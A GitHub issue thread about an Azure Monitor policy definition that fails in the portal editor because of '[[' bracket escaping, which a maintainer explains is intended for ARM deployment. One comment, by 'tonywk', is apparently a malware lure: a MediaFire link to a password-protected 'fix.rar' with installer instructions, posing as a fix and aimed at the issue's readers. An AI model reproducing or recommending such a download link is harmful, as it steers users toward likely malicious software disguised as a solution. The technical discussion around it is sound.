### ISSUE TITLE
Deploy_VM_Memory_Alert has defined parameters which are not used in the policy rule

### ISSUE THREAD

**Issue by brianobr** [Azure/azure-monitor-baseline-alerts#311]
I pasted the policy definition Deploy_VM_Memory_Alert into the Azure Portal policy new definition editor and get the following error:
 
`The policy <GUID> has defined parameters 'alertResourceGroupName,alertResourceGroupTags,alertResourceGroupLocation,severity,operator,timeAggregation,windowSize,evaluationFrequency,autoMitigate,autoResolve,autoResolveTime,enabled,threshold,failingPeriods,evaluationPeriods,effect' which are not used in the policy rule. Please either remove these parameters from the definition or ensure that they are used in the policy rule.`

Those parameters appear to be in use. However, in all of their usages there is a mismatched square bracket, e.g.
`        "effect": "[[parameters('effect')]",`

Replacing _"[[parameters('_ with _"[parameters('_ appears to work.

This seems to be an automation problem as it affects every parameter in the two policies I reviewed.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by arjenhuitema** [comment]
Hi @brianobr, thanks for your feedback,

The policy files you find in the repo are meant to be deployed via ARM. We need those parameters to pass as literal strings and not have them interpreted as expressions. If you copy and paste these policies manually you will indeed need to remove the [ escape character.

**Comment by arjenhuitema** [comment]
Closing this issue as completed, no further actions are required. Thanks again for your feedback.
